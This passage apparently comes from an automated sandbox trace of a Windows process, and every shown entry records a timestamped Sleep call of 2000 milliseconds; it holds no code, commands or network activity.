[0134.072] Sleep (dwMilliseconds=0x7d0) [0134.086] Sleep (dwMilliseconds=0x7d0) [0134.119] Sleep (dwMilliseconds=0x7d0) [0134.134] Sleep (dwMilliseconds=0x7d0) [0134.149] Sleep (dwMilliseconds=0x7d0) [0134.164] Sleep (dwMilliseconds=0x7d0) [0134.180] Sleep (dwMilliseconds=0x7d0) [0134.195] Sleep (dwMilliseconds=0x7d0) [0134.211] Sleep (dwMilliseconds=0x7d0) [0134.228] Sleep (dwMilliseconds=0x7d0) [0134.242] Sleep (dwMilliseconds=0x7d0) [0134.258] Sleep (dwMilliseconds=0x7d0) [0134.295] Sleep (dwMilliseconds=0x7d0) [0134.305] Sleep (dwMilliseconds=0x7d0) [0134.319] Sleep (dwMilliseconds=0x7d0) [0134.336] Sleep (dwMilliseconds=0x7d0) [0134.352] Sleep (dwMilliseconds=0x7d0) [0134.368] Sleep (dwMilliseconds=0x7d0) [0134.382] Sleep (dwMilliseconds=0x7d0) [0134.399] Sleep (dwMilliseconds=0x7d0) [0134.414] Sleep (dwMilliseconds=0x7d0) [0134.437] Sleep (dwMilliseconds=0x7d0) [0134.446] Sleep (dwMilliseconds=0x7d0) [0134.463] Sleep (dwMilliseconds=0x7d0) [0134.475] Sleep (dwMilliseconds=0x7d0) [0134.493] Sleep (dwMilliseconds=0x7d0) [0134.509] Sleep (dwMilliseconds=0x7d0) [0134.523] Sleep (dwMilliseconds=0x7d0) [0134.541] Sleep (dwMilliseconds=0x7d0) [0134.554] Sleep (dwMilliseconds=0x7d0) [0134.570] Sleep (dwMilliseconds=0x7d0) [0134.585] Sleep (dwMilliseconds=0x7d0) [0134.601] Sleep (dwMilliseconds=0x7d0) [0134.620] Sleep (dwMilliseconds=0x7d0) [0134.632] Sleep (dwMilliseconds=0x7d0) [0134.649] Sleep (dwMilliseconds=0x7d0) [0134.663] Sleep (dwMilliseconds=0x7d0) [0134.681] Sleep (dwMilliseconds=0x7d0) [0134.694] Sleep (dwMilliseconds=0x7d0) [0134.711] Sleep (dwMilliseconds=0x7d0) [0134.726] Sleep (dwMilliseconds=0x7d0) [0134.742] Sleep (dwMilliseconds=0x7d0) [0134.757] Sleep (dwMilliseconds=0x7d0) [0134.772] Sleep (dwMilliseconds=0x7d0) [0134.788] Sleep (dwMilliseconds=0x7d0) [0134.820] Sleep (dwMilliseconds=0x7d0) [0134.834] Sleep (dwMilliseconds=0x7d0) [0134.850] Sleep (dwMilliseconds=0x7d0) [0134.875] Sleep (dwMilliseconds=0x7d0) [0134.882] Sleep (dwMilliseconds=0x7d0) [0134.923] Sleep (dwMilliseconds=0x7d0) [0134.937] Sleep (dwMilliseconds=0x7d0) [0134.943] Sleep (dwMilliseconds=0x7d0) [0134.960] Sleep (dwMilliseconds=0x7d0) [0134.975] Sleep (dwMilliseconds=0x7d0) [0134.991] Sleep (dwMilliseconds=0x7d0) [0135.007] Sleep (dwMilliseconds=0x7d0) [0135.022] Sleep (dwMilliseconds=0x7d0) [0135.038] Sleep (dwMilliseconds=0x7d0) [0135.054] Sleep (dwMilliseconds=0x7d0) [0135.071] Sleep (dwMilliseconds=0x7d0) [0135.086] Sleep (dwMilliseconds=0x7d0) [0135.121] Sleep (dwMilliseconds=0x7d0) [0135.133] Sleep (dwMilliseconds=0x7d0) [0135.146] Sleep (dwMilliseconds=0x7d0) [0135.164] Sleep (dwMilliseconds=0x7d0) [0135.197] Sleep (dwMilliseconds=0x7d0) [0135.211] Sleep (dwMilliseconds=0x7d0) [0135.225] Sleep (dwMilliseconds=0x7d0) [0135.242] Sleep (dwMilliseconds=0x7d0) [0135.256] Sleep (dwMilliseconds=0x7d0) [0135.272] Sleep (dwMilliseconds=0x7d0) [0135.290] Sleep (dwMilliseconds=0x7d0) [0135.304] Sleep (dwMilliseconds=0x7d0) [0135.319] Sleep (dwMilliseconds=0x7d0) [0135.334] Sleep (dwMilliseconds=0x7d0) [0135.350] Sleep (dwMilliseconds=0x7d0) [0135.367] Sleep (dwMilliseconds=0x7d0) [0135.381] Sleep (dwMilliseconds=0x7d0) [0135.398] Sleep (dwMilliseconds=0x7d0) [0135.413] Sleep (dwMilliseconds=0x7d0) [0135.428] Sleep (dwMilliseconds=0x7d0) [0135.443] Sleep (dwMilliseconds=0x7d0) [0135.459] Sleep (dwMilliseconds=0x7d0) [0135.474] Sleep (dwMilliseconds=0x7d0) [0135.490] Sleep (dwMilliseconds=0x7d0) [0135.506] Sleep (dwMilliseconds=0x7d0) [0135.522] Sleep (dwMilliseconds=0x7d0) [0135.537] Sleep (dwMilliseconds=0x7d0) [0135.555] Sleep (dwMilliseconds=0x7d0) [0135.568] Sleep (dwMilliseconds=0x7d0) [0135.584] Sleep (dwMilliseconds=0x7d0) [0135.599] Sleep (dwMilliseconds=0x7d0) [0135.618] Sleep (dwMilliseconds=0x7d0) [0135.631] Sleep (dwMilliseconds=0x7d0) [0135.646] Sleep (dwMilliseconds=0x7d0) [0135.662] Sleep (dwMilliseconds=0x7d0) [0135.678] Sleep (dwMilliseconds=0x7d0) [0135.692] Sleep (dwMilliseconds=0x7d0) [0135.708] Sleep (dwMilliseconds=0x7d0) [0135.726] Sleep (dwMilliseconds=0x7d0) [0135.741] Sleep (dwMilliseconds=0x7d0) [0135.758] Sleep (dwMilliseconds=0x7d0) [0135.770] Sleep (dwMilliseconds=0x7d0) [0135.786] Sleep (dwMilliseconds=0x7d0) [0135.808] Sleep (dwMilliseconds=0x7d0) [0135.836] Sleep (dwMilliseconds=0x7d0) [0135.853] Sleep (dwMilliseconds=0x7d0) [0135.864] Sleep (dwMilliseconds=0x7d0) [0135.885] Sleep (dwMilliseconds=0x7d0) [0135.896] Sleep (dwMilliseconds=0x7d0) [0135.911] Sleep (dwMilliseconds=0x7d0) [0135.928] Sleep (dwMilliseconds=0x7d0) [0135.945] Sleep (dwMilliseconds=0x7d0) [0135.958] Sleep (dwMilliseconds=0x7d0) [0135.974] Sleep (dwMilliseconds=0x7d0) [0135.990] Sleep (dwMilliseconds=0x7d0) [0136.005] Sleep (dwMilliseconds=0x7d0) [0136.021] Sleep (dwMilliseconds=0x7d0) [0136.059] Sleep (dwMilliseconds=0x7d0) [0136.067] Sleep (dwMilliseconds=0x7d0) [0136.083] Sleep (dwMilliseconds=0x7d0) [0136.114] Sleep (dwMilliseconds=0x7d0) [0136.132] Sleep (dwMilliseconds=0x7d0) [0136.145] Sleep (dwMilliseconds=0x7d0) [0136.161] Sleep (dwMilliseconds=0x7d0) [0136.176] Sleep (dwMilliseconds=0x7d0) [0136.192] Sleep (dwMilliseconds=0x7d0) [0136.208] Sleep (dwMilliseconds=0x7d0) [0136.223] Sleep (dwMilliseconds=0x7d0) [0136.246] Sleep (dwMilliseconds=0x7d0) [0136.255] Sleep (dwMilliseconds=0x7d0) [0136.272] Sleep (dwMilliseconds=0x7d0) [0136.300] Sleep (dwMilliseconds=0x7d0) [0136.318] Sleep (dwMilliseconds=0x7d0) [0136.332] Sleep (dwMilliseconds=0x7d0) [0136.349] Sleep (dwMilliseconds=0x7d0) [0136.364] Sleep (dwMilliseconds=0x7d0) [0136.382] Sleep (dwMilliseconds=0x7d0) [0136.395] Sleep (dwMilliseconds=0x7d0) [0136.411] Sleep (dwMilliseconds=0x7d0) [0136.426] Sleep (dwMilliseconds=0x7d0) [0136.442] Sleep (dwMilliseconds=0x7d0) [0136.460] Sleep (dwMilliseconds=0x7d0) [0136.473] Sleep (dwMilliseconds=0x7d0) [0136.489] Sleep (dwMilliseconds=0x7d0) [0136.504] Sleep (dwMilliseconds=0x7d0) [0136.520] Sleep (dwMilliseconds=0x7d0) [0136.537] Sleep (dwMilliseconds=0x7d0) [0136.559] Sleep (dwMilliseconds=0x7d0) [0136.574] Sleep (dwMilliseconds=0x7d0) [0136.582] Sleep (dwMilliseconds=0x7d0) [0136.599] Sleep (dwMilliseconds=0x7d0) [0136.613] Sleep (dwMilliseconds=0x7d0) [0136.629] Sleep (dwMilliseconds=0x7d0) [0136.644] Sleep (dwMilliseconds=0x7d0) [0136.663] Sleep (dwMilliseconds=0x7d0) [0136.676] Sleep (dwMilliseconds=0x7d0) [0136.691] Sleep (dwMilliseconds=0x7d0) [0136.708] Sleep (dwMilliseconds=0x7d0) [0136.723] Sleep (dwMilliseconds=0x7d0) [0136.738] Sleep (dwMilliseconds=0x7d0) [0136.755] Sleep (dwMilliseconds=0x7d0) [0136.770] Sleep (dwMilliseconds=0x7d0) [0136.785] Sleep (dwMilliseconds=0x7d0) [0136.800] Sleep (dwMilliseconds=0x7d0) [0136.817] Sleep (dwMilliseconds=0x7d0) [0136.836] Sleep (dwMilliseconds=0x7d0) [0136.847] Sleep (dwMilliseconds=0x7d0) [0136.863] Sleep (dwMilliseconds=0x7d0) [0136.879] Sleep (dwMilliseconds=0x7d0) [0136.897] Sleep (dwMilliseconds=0x7d0) [0136.906] Sleep (dwMilliseconds=0x7d0) [0136.922] Sleep (dwMilliseconds=0x7d0) [0136.940] Sleep (dwMilliseconds=0x7d0) [0136.955] Sleep (dwMilliseconds=0x7d0) [0136.968] Sleep (dwMilliseconds=0x7d0) [0136.986] Sleep (dwMilliseconds=0x7d0) [0136.999] Sleep (dwMilliseconds=0x7d0) [0137.015] Sleep (dwMilliseconds=0x7d0) [0137.032] Sleep (dwMilliseconds=0x7d0) [0137.046] Sleep (dwMilliseconds=0x7d0) [0137.062] Sleep (dwMilliseconds=0x7d0) [0137.077] Sleep (dwMilliseconds=0x7d0) [0137.110] Sleep (dwMilliseconds=0x7d0) [0137.124] Sleep (dwMilliseconds=0x7d0) [0137.141] Sleep (dwMilliseconds=0x7d0) [0137.155] Sleep (dwMilliseconds=0x7d0) [0137.171] Sleep (dwMilliseconds=0x7d0) [0137.187] Sleep (dwMilliseconds=0x7d0) [0137.202] Sleep (dwMilliseconds=0x7d0) [0137.218] Sleep (dwMilliseconds=0x7d0) [0137.233] Sleep (dwMilliseconds=0x7d0) [0137.250] Sleep (dwMilliseconds=0x7d0) [0137.265] Sleep (dwMilliseconds=0x7d0) [0137.281] Sleep (dwMilliseconds=0x7d0) [0137.299] Sleep (dwMilliseconds=0x7d0) [0137.311] Sleep (dwMilliseconds=0x7d0) [0137.327] Sleep (dwMilliseconds=0x7d0) [0137.343] Sleep (dwMilliseconds=0x7d0) [0137.359] Sleep (dwMilliseconds=0x7d0) [0137.374] Sleep (dwMilliseconds=0x7d0) [0137.389] Sleep (dwMilliseconds=0x7d0) [0137.405] Sleep (dwMilliseconds=0x7d0) [0137.421] Sleep (dwMilliseconds=0x7d0) [0137.463] Sleep (dwMilliseconds=0x7d0) [0137.476] Sleep (dwMilliseconds=0x7d0) [0137.486] Sleep (dwMilliseconds=0x7d0) [0137.503] Sleep (dwMilliseconds=0x7d0) [0137.519] Sleep (dwMilliseconds=0x7d0) [0137.533] Sleep (dwMilliseconds=0x7d0) [0137.550] Sleep (dwMilliseconds=0x7d0) [0137.570] Sleep (dwMilliseconds=0x7d0) [0137.580] Sleep (dwMilliseconds=0x7d0) [0137.596] Sleep (dwMilliseconds=0x7d0) [0137.613] Sleep (dwMilliseconds=0x7d0) [0137.628] Sleep (dwMilliseconds=0x7d0) [0137.643] Sleep (dwMilliseconds=0x7d0) [0137.659] Sleep (dwMilliseconds=0x7d0) [0137.675] Sleep (dwMilliseconds=0x7d0) [0137.690] Sleep (dwMilliseconds=0x7d0) [0137.706] Sleep (dwMilliseconds=0x7d0) [0137.721] Sleep (dwMilliseconds=0x7d0) [0137.737] Sleep (dwMilliseconds=0x7d0) [0137.752] Sleep (dwMilliseconds=0x7d0) [0137.768] Sleep (dwMilliseconds=0x7d0) [0137.784] Sleep (dwMilliseconds=0x7d0) [0137.801] Sleep (dwMilliseconds=0x7d0) [0137.815] Sleep (dwMilliseconds=0x7d0) [0137.830] Sleep (dwMilliseconds=0x7d0) [0137.851] Sleep (dwMilliseconds=0x7d0) [0137.860] Sleep (dwMilliseconds=0x7d0) [0137.878] Sleep (dwMilliseconds=0x7d0) [0137.896] Sleep (dwMilliseconds=0x7d0) [0137.911] Sleep (dwMilliseconds=0x7d0) [0137.924] Sleep (dwMilliseconds=0x7d0) [0137.940] Sleep (dwMilliseconds=0x7d0) [0137.955] Sleep (dwMilliseconds=0x7d0) [0137.973] Sleep (dwMilliseconds=0x7d0) [0137.986] Sleep (dwMilliseconds=0x7d0) [0138.003] Sleep (dwMilliseconds=0x7d0) [0138.017] Sleep (dwMilliseconds=0x7d0) [0138.033] Sleep (dwMilliseconds=0x7d0) [0138.050] Sleep (dwMilliseconds=0x7d0) [0138.064] Sleep (dwMilliseconds=0x7d0) [0138.080] Sleep (dwMilliseconds=0x7d0) [0138.110] Sleep (dwMilliseconds=0x7d0) [0138.127] Sleep (dwMilliseconds=0x7d0) [0138.142] Sleep (dwMilliseconds=0x7d0) [0138.158] Sleep (dwMilliseconds=0x7d0) [0138.174] Sleep (dwMilliseconds=0x7d0) [0138.188] Sleep (dwMilliseconds=0x7d0) [0138.206] Sleep (dwMilliseconds=0x7d0) [0138.222] Sleep (dwMilliseconds=0x7d0) [0138.236] Sleep (dwMilliseconds=0x7d0) [0138.251] Sleep (dwMilliseconds=0x7d0) [0138.267] Sleep (dwMilliseconds=0x7d0) [0138.286] Sleep (dwMilliseconds=0x7d0) [0138.300] Sleep (dwMilliseconds=0x7d0) [0138.315] Sleep (dwMilliseconds=0x7d0) [0138.330] Sleep (dwMilliseconds=0x7d0) [0138.345] Sleep (dwMilliseconds=0x7d0) [0138.361] Sleep (dwMilliseconds=0x7d0) [0138.377] Sleep (dwMilliseconds=0x7d0) [0138.392] Sleep (dwMilliseconds=0x7d0) [0138.407] Sleep (dwMilliseconds=0x7d0) [0138.424] Sleep (dwMilliseconds=0x7d0) [0138.441] Sleep (dwMilliseconds=0x7d0) [0138.454] Sleep (dwMilliseconds=0x7d0) [0138.474] Sleep (dwMilliseconds=0x7d0) [0138.485] Sleep (dwMilliseconds=0x7d0) [0138.501] Sleep (dwMilliseconds=0x7d0) [0138.517] Sleep (dwMilliseconds=0x7d0) [0138.533] Sleep (dwMilliseconds=0x7d0) [0138.548] Sleep (dwMilliseconds=0x7d0) [0138.563] Sleep (dwMilliseconds=0x7d0) [0138.580] Sleep (dwMilliseconds=0x7d0) [0138.595] Sleep (dwMilliseconds=0x7d0) [0138.610] Sleep (dwMilliseconds=0x7d0) [0138.626] Sleep (dwMilliseconds=0x7d0) [0138.643] Sleep (dwMilliseconds=0x7d0) [0138.657] Sleep (dwMilliseconds=0x7d0) [0138.674] Sleep (dwMilliseconds=0x7d0) [0138.690] Sleep (dwMilliseconds=0x7d0) [0138.704] Sleep (dwMilliseconds=0x7d0) [0138.720] Sleep (dwMilliseconds=0x7d0) [0138.736] Sleep (dwMilliseconds=0x7d0) [0138.757] Sleep (dwMilliseconds=0x7d0) [0138.769] Sleep (dwMilliseconds=0x7d0) [0138.788] Sleep (dwMilliseconds=0x7d0) [0138.800] Sleep (dwMilliseconds=0x7d0) [0138.813] Sleep (dwMilliseconds=0x7d0) [0138.840] Sleep (dwMilliseconds=0x7d0) [0138.844] Sleep (dwMilliseconds=0x7d0) [0138.860] Sleep (dwMilliseconds=0x7d0) [0138.875] Sleep (dwMilliseconds=0x7d0) [0138.893] Sleep (dwMilliseconds=0x7d0) [0138.907] Sleep (dwMilliseconds=0x7d0) [0138.927] Sleep (dwMilliseconds=0x7d0) [0138.938] Sleep (dwMilliseconds=0x7d0) [0138.955] Sleep (dwMilliseconds=0x7d0) [0138.970] Sleep (dwMilliseconds=0x7d0) [0138.988] Sleep (dwMilliseconds=0x7d0) [0139.001] Sleep (dwMilliseconds=0x7d0) [0139.017] Sleep (dwMilliseconds=0x7d0) [0139.031] Sleep (dwMilliseconds=0x7d0) [0139.047] Sleep (dwMilliseconds=0x7d0) [0139.064] Sleep (dwMilliseconds=0x7d0) [0139.078] Sleep (dwMilliseconds=0x7d0) [0139.120] Sleep (dwMilliseconds=0x7d0) [0139.126] Sleep (dwMilliseconds=0x7d0) [0139.143] Sleep (dwMilliseconds=0x7d0) [0139.156] Sleep (dwMilliseconds=0x7d0) [0139.173] Sleep (dwMilliseconds=0x7d0) [0139.188] Sleep (dwMilliseconds=0x7d0) [0139.203] Sleep (dwMilliseconds=0x7d0) [0139.218] Sleep (dwMilliseconds=0x7d0) [0139.234] Sleep (dwMilliseconds=0x7d0) [0139.250] Sleep (dwMilliseconds=0x7d0) [0139.266] Sleep (dwMilliseconds=0x7d0) [0139.283] Sleep (dwMilliseconds=0x7d0) [0139.316] Sleep (dwMilliseconds=0x7d0) [0139.328] Sleep (dwMilliseconds=0x7d0) [0139.344] Sleep (dwMilliseconds=0x7d0) [0139.360] Sleep (dwMilliseconds=0x7d0) [0139.376] Sleep (dwMilliseconds=0x7d0) [0139.392] Sleep (dwMilliseconds=0x7d0) [0139.407] Sleep (dwMilliseconds=0x7d0) [0139.422] Sleep (dwMilliseconds=0x7d0) [0139.438] Sleep (dwMilliseconds=0x7d0) [0139.456] Sleep (dwMilliseconds=0x7d0) [0139.469] Sleep (dwMilliseconds=0x7d0) [0139.485] Sleep (dwMilliseconds=0x7d0) [0139.502] Sleep (dwMilliseconds=0x7d0) [0139.515] Sleep (dwMilliseconds=0x7d0) [0139.531] Sleep (dwMilliseconds=0x7d0) [0139.548] Sleep (dwMilliseconds=0x7d0) [0139.566] Sleep (dwMilliseconds=0x7d0) [0139.578] Sleep (dwMilliseconds=0x7d0) [0139.593] Sleep (dwMilliseconds=0x7d0) [0139.610] Sleep (dwMilliseconds=0x7d0) [0139.624] Sleep (dwMilliseconds=0x7d0) [0139.640] Sleep (dwMilliseconds=0x7d0) [0139.656] Sleep (dwMilliseconds=0x7d0) [0139.672] Sleep (dwMilliseconds=0x7d0) [0139.689] Sleep (dwMilliseconds=0x7d0) [0139.706] Sleep (dwMilliseconds=0x7d0) [0139.719] Sleep (dwMilliseconds=0x7d0) [0139.734] Sleep (dwMilliseconds=0x7d0) [0139.751] Sleep (dwMilliseconds=0x7d0) [0139.766] Sleep (dwMilliseconds=0x7d0) [0139.781] Sleep (dwMilliseconds=0x7d0) [0139.797] Sleep (dwMilliseconds=0x7d0) [0139.813] Sleep (dwMilliseconds=0x7d0) [0139.828] Sleep (dwMilliseconds=0x7d0) [0139.843] Sleep (dwMilliseconds=0x7d0) [0139.863] Sleep (dwMilliseconds=0x7d0) [0139.874] Sleep (dwMilliseconds=0x7d0) [0139.890] Sleep (dwMilliseconds=0x7d0) [0139.905] Sleep (dwMilliseconds=0x7d0) [0139.921] Sleep (dwMilliseconds=0x7d0) [0139.941] Sleep (dwMilliseconds=0x7d0) [0139.952] Sleep (dwMilliseconds=0x7d0) [0139.968] Sleep (dwMilliseconds=0x7d0) [0139.991] Sleep (dwMilliseconds=0x7d0) [0140.001] Sleep (dwMilliseconds=0x7d0) [0140.014] Sleep (dwMilliseconds=0x7d0) [0140.031] Sleep (dwMilliseconds=0x7d0) [0140.046] Sleep (dwMilliseconds=0x7d0) [0140.062] Sleep (dwMilliseconds=0x7d0) [0140.078] Sleep (dwMilliseconds=0x7d0) [0140.116] Sleep (dwMilliseconds=0x7d0) [0140.124] Sleep (dwMilliseconds=0x7d0) [0140.142] Sleep (dwMilliseconds=0x7d0) [0140.155] Sleep (dwMilliseconds=0x7d0) [0140.170] Sleep (dwMilliseconds=0x7d0) [0140.187] Sleep (dwMilliseconds=0x7d0) [0140.202] Sleep (dwMilliseconds=0x7d0) [0140.218] Sleep (dwMilliseconds=0x7d0) [0140.233] Sleep (dwMilliseconds=0x7d0) [0140.257] Sleep (dwMilliseconds=0x7d0) [0140.264] Sleep (dwMilliseconds=0x7d0) [0140.280] Sleep (dwMilliseconds=0x7d0) [0140.295] Sleep (dwMilliseconds=0x7d0) [0140.312] Sleep (dwMilliseconds=0x7d0) [0140.328] Sleep (dwMilliseconds=0x7d0) [0140.342] Sleep (dwMilliseconds=0x7d0) [0140.360] Sleep (dwMilliseconds=0x7d0) [0140.374] Sleep (dwMilliseconds=0x7d0) [0140.394] Sleep (dwMilliseconds=0x7d0) [0140.406] Sleep (dwMilliseconds=0x7d0) [0140.421] Sleep (dwMilliseconds=0x7d0) [0140.437] Sleep (dwMilliseconds=0x7d0) [0140.453] Sleep (dwMilliseconds=0x7d0) [0140.469] Sleep (dwMilliseconds=0x7d0) [0140.484] Sleep (dwMilliseconds=0x7d0) [0140.499] Sleep (dwMilliseconds=0x7d0) [0140.515] Sleep (dwMilliseconds=0x7d0) [0140.529] Sleep (dwMilliseconds=0x7d0) [0140.545] Sleep (dwMilliseconds=0x7d0) [0140.561] Sleep (dwMilliseconds=0x7d0) [0140.578] Sleep (dwMilliseconds=0x7d0) [0140.595] Sleep (dwMilliseconds=0x7d0) [0140.608] Sleep (dwMilliseconds=0x7d0) [0140.623] Sleep (dwMilliseconds=0x7d0) [0140.640] Sleep (dwMilliseconds=0x7d0) [0140.654] Sleep (dwMilliseconds=0x7d0) [0140.670] Sleep (dwMilliseconds=0x7d0) [0140.687] Sleep (dwMilliseconds=0x7d0) [0140.701] Sleep (dwMilliseconds=0x7d0) [0140.716] Sleep (dwMilliseconds=0x7d0) [0140.732] Sleep (dwMilliseconds=0x7d0) [0140.747] Sleep (dwMilliseconds=0x7d0) [0140.763] Sleep (dwMilliseconds=0x7d0) [0140.783] Sleep (dwMilliseconds=0x7d0) [0140.794] Sleep (dwMilliseconds=0x7d0) [0140.815] Sleep (dwMilliseconds=0x7d0) [0140.825] Sleep (dwMilliseconds=0x7d0) [0140.843] Sleep (dwMilliseconds=0x7d0) [0140.864] Sleep (dwMilliseconds=0x7d0) [0140.896] Sleep (dwMilliseconds=0x7d0) [0140.905] Sleep (dwMilliseconds=0x7d0) [0140.918] Sleep (dwMilliseconds=0x7d0) [0140.935] Sleep (dwMilliseconds=0x7d0) [0140.956] Sleep (dwMilliseconds=0x7d0) [0140.965] Sleep (dwMilliseconds=0x7d0) [0140.984] Sleep (dwMilliseconds=0x7d0) [0141.008] Sleep (dwMilliseconds=0x7d0) [0141.013] Sleep (dwMilliseconds=0x7d0) [0141.028] Sleep (dwMilliseconds=0x7d0) [0141.044] Sleep (dwMilliseconds=0x7d0) [0141.061] Sleep (dwMilliseconds=0x7d0) [0141.076] Sleep (dwMilliseconds=0x7d0) [0141.112] Sleep (dwMilliseconds=0x7d0) [0141.121] Sleep (dwMilliseconds=0x7d0) [0141.137] Sleep (dwMilliseconds=0x7d0) [0141.153] Sleep (dwMilliseconds=0x7d0) [0141.169] Sleep (dwMilliseconds=0x7d0) [0141.188] Sleep (dwMilliseconds=0x7d0) [0141.199] Sleep (dwMilliseconds=0x7d0) [0141.218] Sleep (dwMilliseconds=0x7d0) [0141.231] Sleep (dwMilliseconds=0x7d0) [0141.247] Sleep (dwMilliseconds=0x7d0) [0141.263] Sleep (dwMilliseconds=0x7d0) [0141.279] Sleep (dwMilliseconds=0x7d0) [0141.294] Sleep (dwMilliseconds=0x7d0) [0141.323] Sleep (dwMilliseconds=0x7d0) [0141.340] Sleep (dwMilliseconds=0x7d0) [0141.356] Sleep (dwMilliseconds=0x7d0) [0141.372] Sleep (dwMilliseconds=0x7d0) [0141.387] Sleep (dwMilliseconds=0x7d0) [0141.403] Sleep (dwMilliseconds=0x7d0) [0141.419] Sleep (dwMilliseconds=0x7d0) [0141.434] Sleep (dwMilliseconds=0x7d0) [0141.450] Sleep (dwMilliseconds=0x7d0) [0141.465] Sleep (dwMilliseconds=0x7d0) [0141.482] Sleep (dwMilliseconds=0x7d0) [0141.495] Sleep (dwMilliseconds=0x7d0) [0141.512] Sleep (dwMilliseconds=0x7d0) [0141.536] Sleep (dwMilliseconds=0x7d0) [0141.542] Sleep (dwMilliseconds=0x7d0) [0141.559] Sleep (dwMilliseconds=0x7d0) [0141.574] Sleep (dwMilliseconds=0x7d0) [0141.591] Sleep (dwMilliseconds=0x7d0) [0141.606] Sleep (dwMilliseconds=0x7d0) [0141.621] Sleep (dwMilliseconds=0x7d0) [0141.638] Sleep (dwMilliseconds=0x7d0) [0141.652] Sleep (dwMilliseconds=0x7d0) [0141.667] Sleep (dwMilliseconds=0x7d0) [0141.683] Sleep (dwMilliseconds=0x7d0) [0141.698] Sleep (dwMilliseconds=0x7d0) [0141.714] Sleep (dwMilliseconds=0x7d0) [0141.730] Sleep (dwMilliseconds=0x7d0) [0141.746] Sleep (dwMilliseconds=0x7d0) [0141.763] Sleep (dwMilliseconds=0x7d0) [0141.776] Sleep (dwMilliseconds=0x7d0) [0141.792] Sleep (dwMilliseconds=0x7d0) [0141.808] Sleep (dwMilliseconds=0x7d0) [0141.823] Sleep (dwMilliseconds=0x7d0) [0141.839] Sleep (dwMilliseconds=0x7d0) [0141.856] Sleep (dwMilliseconds=0x7d0) [0141.874] Sleep (dwMilliseconds=0x7d0) [0141.887] Sleep (dwMilliseconds=0x7d0) [0141.903] Sleep (dwMilliseconds=0x7d0) [0141.918] Sleep (dwMilliseconds=0x7d0) [0141.933] Sleep (dwMilliseconds=0x7d0) [0141.948] Sleep (dwMilliseconds=0x7d0) [0141.967] Sleep (dwMilliseconds=0x7d0) [0141.980] Sleep (dwMilliseconds=0x7d0) [0142.012] Sleep (dwMilliseconds=0x7d0) [0142.029] Sleep (dwMilliseconds=0x7d0) [0142.042] Sleep (dwMilliseconds=0x7d0) [0142.058] Sleep (dwMilliseconds=0x7d0) [0142.074] Sleep (dwMilliseconds=0x7d0) [0142.123] Sleep (dwMilliseconds=0x7d0) [0142.136] Sleep (dwMilliseconds=0x7d0) [0142.150] Sleep (dwMilliseconds=0x7d0) [0142.166] Sleep (dwMilliseconds=0x7d0) [0142.183] Sleep (dwMilliseconds=0x7d0) [0142.199] Sleep (dwMilliseconds=0x7d0) [0142.215] Sleep (dwMilliseconds=0x7d0) [0142.232] Sleep (dwMilliseconds=0x7d0) [0142.245] Sleep (dwMilliseconds=0x7d0) [0142.261] Sleep (dwMilliseconds=0x7d0) [0142.277] Sleep (dwMilliseconds=0x7d0) [0142.300] Sleep (dwMilliseconds=0x7d0) [0142.307] Sleep (dwMilliseconds=0x7d0) [0142.328] Sleep (dwMilliseconds=0x7d0) [0142.340] Sleep (dwMilliseconds=0x7d0) [0142.354] Sleep (dwMilliseconds=0x7d0) [0142.370] Sleep (dwMilliseconds=0x7d0) [0142.385] Sleep (dwMilliseconds=0x7d0) [0142.401] Sleep (dwMilliseconds=0x7d0) [0142.416] Sleep (dwMilliseconds=0x7d0) [0142.432] Sleep (dwMilliseconds=0x7d0) [0142.447] Sleep (dwMilliseconds=0x7d0) [0142.463] Sleep (dwMilliseconds=0x7d0) [0142.481] Sleep (dwMilliseconds=0x7d0) [0142.494] Sleep (dwMilliseconds=0x7d0) [0142.511] Sleep (dwMilliseconds=0x7d0) [0142.525] Sleep (dwMilliseconds=0x7d0) [0142.541] Sleep (dwMilliseconds=0x7d0) [0142.556] Sleep (dwMilliseconds=0x7d0) [0142.572] Sleep (dwMilliseconds=0x7d0) [0142.587] Sleep (dwMilliseconds=0x7d0) [0142.603] Sleep (dwMilliseconds=0x7d0) [0142.621] Sleep (dwMilliseconds=0x7d0) [0142.636] Sleep (dwMilliseconds=0x7d0) [0142.650] Sleep (dwMilliseconds=0x7d0) [0142.665] Sleep (dwMilliseconds=0x7d0) [0142.681] Sleep (dwMilliseconds=0x7d0) [0142.697] Sleep (dwMilliseconds=0x7d0) [0142.712] Sleep (dwMilliseconds=0x7d0) [0142.729] Sleep (dwMilliseconds=0x7d0) [0142.743] Sleep (dwMilliseconds=0x7d0) [0142.759] Sleep (dwMilliseconds=0x7d0) [0142.775] Sleep (dwMilliseconds=0x7d0) [0142.790] Sleep (dwMilliseconds=0x7d0) [0142.806] Sleep (dwMilliseconds=0x7d0) [0142.821] Sleep (dwMilliseconds=0x7d0) [0142.838] Sleep (dwMilliseconds=0x7d0) [0142.852] Sleep (dwMilliseconds=0x7d0) [0142.868] Sleep (dwMilliseconds=0x7d0) [0142.891] Sleep (dwMilliseconds=0x7d0) [0142.900] Sleep (dwMilliseconds=0x7d0) [0142.916] Sleep (dwMilliseconds=0x7d0) [0142.931] Sleep (dwMilliseconds=0x7d0) [0142.947] Sleep (dwMilliseconds=0x7d0) [0142.962] Sleep (dwMilliseconds=0x7d0) [0142.980] Sleep (dwMilliseconds=0x7d0) [0142.993] Sleep (dwMilliseconds=0x7d0) [0143.008] Sleep (dwMilliseconds=0x7d0) [0143.025] Sleep (dwMilliseconds=0x7d0) [0143.042] Sleep (dwMilliseconds=0x7d0) [0143.057] Sleep (dwMilliseconds=0x7d0) [0143.071] Sleep (dwMilliseconds=0x7d0) [0143.106] Sleep (dwMilliseconds=0x7d0) [0143.118] Sleep (dwMilliseconds=0x7d0) [0143.134] Sleep (dwMilliseconds=0x7d0) [0143.149] Sleep (dwMilliseconds=0x7d0) [0143.165] Sleep (dwMilliseconds=0x7d0) [0143.182] Sleep (dwMilliseconds=0x7d0) [0143.196] Sleep (dwMilliseconds=0x7d0) [0143.211] Sleep (dwMilliseconds=0x7d0) [0143.227] Sleep (dwMilliseconds=0x7d0) [0143.244] Sleep (dwMilliseconds=0x7d0) [0143.259] Sleep (dwMilliseconds=0x7d0) [0143.275] Sleep (dwMilliseconds=0x7d0) [0143.290] Sleep (dwMilliseconds=0x7d0) [0143.306] Sleep (dwMilliseconds=0x7d0) [0143.326] Sleep (dwMilliseconds=0x7d0) [0143.336] Sleep (dwMilliseconds=0x7d0) [0143.352] Sleep (dwMilliseconds=0x7d0) [0143.368] Sleep (dwMilliseconds=0x7d0) [0143.385] Sleep (dwMilliseconds=0x7d0) [0143.400] Sleep (dwMilliseconds=0x7d0) [0143.415] Sleep 